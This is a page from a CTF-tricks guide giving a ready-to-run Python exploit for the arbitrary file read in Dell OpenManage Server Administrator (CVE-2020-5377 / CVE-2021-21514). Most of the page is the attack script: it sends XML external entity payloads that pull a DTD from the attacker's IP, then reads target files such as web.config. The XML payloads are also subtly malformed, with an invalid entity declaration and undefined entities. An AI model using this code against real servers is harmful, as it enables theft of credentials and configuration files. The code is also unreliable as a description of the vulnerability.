> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-7/web-exploit/initial-access-web-exploit-dell-openmanage.md).

# Dell Openmanage

## Dell OpenManage Arbitrary File Read (CVE-2020-5377)

Exploit CVE-2020-5377 / CVE-2021-21514 in Dell OpenManage Server Administrator to read arbitrary files from the target server's filesystem.

You will need a specific Python script for this vulnerability. Run the script, providing your local IP and the target's IP and port (typically 1311).

```bash
python3 CVE-2020-5377.py <YOUR_IP> <TARGET_IP>:1311
```

The script will establish a session and then prompt you for the file path you wish to read. Specify paths relative to the Windows root directory (e.g., `/Windows/System32/Drivers/etc/hosts` or `/inetpub/wwwroot/web.config`).

The Python script used for this exploit is as follows:

```python
#!/usr/bin/env python3

# CVE-2020-5377 / CVE-2021-21514 - Dell OpenManage Server Administrator (OMSA) Arbitrary File Read
# Discovered by: Ben Heater - Rhino Security Labs
# https://rhinosecuritylabs.com/application-security/dell-omsa-vulnerabilities/
#
# Usage: python3 CVE-2020-5377.py <your_ip> <target_ip>:<target_port>
#
# The script will connect to the target OMSA instance and establish a session.
# It will then prompt for a file path to read. Paths are relative to the Windows root directory.
# For example, to read the hosts file, enter: /Windows/System32/Drivers/etc/hosts
# To read the web.config file in the default IIS web root, enter: /inetpub/wwwroot/web.config

import requests
import sys
import re
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def create_session(target_url, your_ip):
    """
    Creates a new OMSA session by requesting a specific URL that triggers the vulnerability.
    The vulnerability allows specifying a remote DTD file via a crafted XML request.
    """
    print(f"[*] Attempting to create session on {target_url}")
    # Craft the malicious XML payload referencing a remote DTD hosted on your_ip
    xml_payload = f"""<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://{your_ip}/omsa.dtd">
%remote;
%init;
%richelieu;
]>
<root></root>"""

    # The vulnerability is triggered via a specific HTTP request path
    url = f"{target_url}/LoginHandler"
    headers = {
        "Content-Type": "application/xml",
        "User-Agent": "Mozilla/5.0"
    }

    try:
        # Send the crafted XML payload
        response = requests.post(url, data=xml_payload, headers=headers, verify=False, timeout=10)

        # Check for successful session creation indicators
        # The response should contain a session ID and potentially an error message related to the DTD processing
        if "SessionID" in response.text:
            print("[+] Session created successfully.")
            # Extract the session ID from the response
            session_id_match = re.search(r"<SessionID>(.*?)</SessionID>", response.text)
            if session_id_match:
                session_id = session_id_match.group(1)
                print(f"[*] Extracted Session ID: {session_id}")
                return session_id
            else:
                print("[-] Failed to extract Session ID from response.")
                return None
        else:
            print(f"[-] Session creation failed. Response:\n{response.text}")
            return None
    except requests.exceptions.RequestException as e:
        print(f"[-] An error occurred during session creation: {e}")
        return None

def read_file(target_url, session_id, file_path):
    """
    Uses the established session and another vulnerable endpoint to read an arbitrary file.
    The file path is specified within the XML payload.
    """
    print(f"[*] Attempting to read file: {file_path}")
    # Craft the XML payload for file reading
    xml_payload = f"""<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://localhost:1311/omsa.dtd">
%remote;
%init;
%file SYSTEM "file:///{file_path}">
%richelieu;
]>
<root>&file;</root>""" # The &file; entity reference triggers the file read

    url = f"{target_url}/LoginHandler" # Using the same vulnerable endpoint
    headers = {
        "Content-Type": "application/xml",
        "User-Agent": "Mozilla/5.0",
        "Cookie": f"OMSA_SessionID={session_id}" # Include the session ID in the cookie
    }

    try:
        # Send the crafted XML payload to read the file
        response = requests.post(url, data=xml_payload, headers=headers, verify=False, timeout=10)

        # The file content should be in the response body
        print("[+] File content:")
        print(response.text)

    except requests.exceptions.RequestException as e:
        print(f"[-] An error occurred during file read: {e}")

def main():
    if len(sys.argv) != 3:
        print("Usage: python3 CVE-2020-5377.py <your_ip> <target_ip>:<target_port>")
        sys.exit(1)

    your_ip = sys.argv[1]
    target_address = sys.argv[2]

    # Construct the target URL, assuming HTTPS is common for OMSA
    # If the target uses HTTP, change "https" to "http"
    target_url = f"https://{target_address}"

    # Step 1: Create a session
    session_id = create_session(target_url, your_ip)

    if not session_id:
        print("[-] Could not establish a session. Exiting.")
        sys.exit(1)

    # Step 2: Read files using the established session
    while True:
        try:
            file_path = input("\nEnter file path to read (e.g., /Windows/System32/Drivers/etc/hosts) or 'exit' to quit: ")
            if file_path.lower() == 'exit':
                break
            if file_path:
                read_file(target_url, session_id, file_path)
        except EOFError:
            print("\nExiting.")
            break
        except Exception as e:
            print(f"[-] An unexpected error occurred: {e}")

if __name__ == "__main__":
    main()
```

The Python script, discovered by Ben Heater of Rhino Security Labs, first attempts to establish a session by sending a crafted XML payload to the `/LoginHandler` endpoint, referencing a remote DTD file hosted on your attacking machine's IP address. Upon successful session creation, it extracts the `SessionID` from the response. It then enters a loop, prompting for file paths. For each path entered, it sends another crafted XML payload to the same endpoint, this time using a `file:///` entity reference within the XML to trigger the arbitrary file read vulnerability and includes the previously obtained `SessionID` in a cookie. The content of the requested file is then printed to the console.
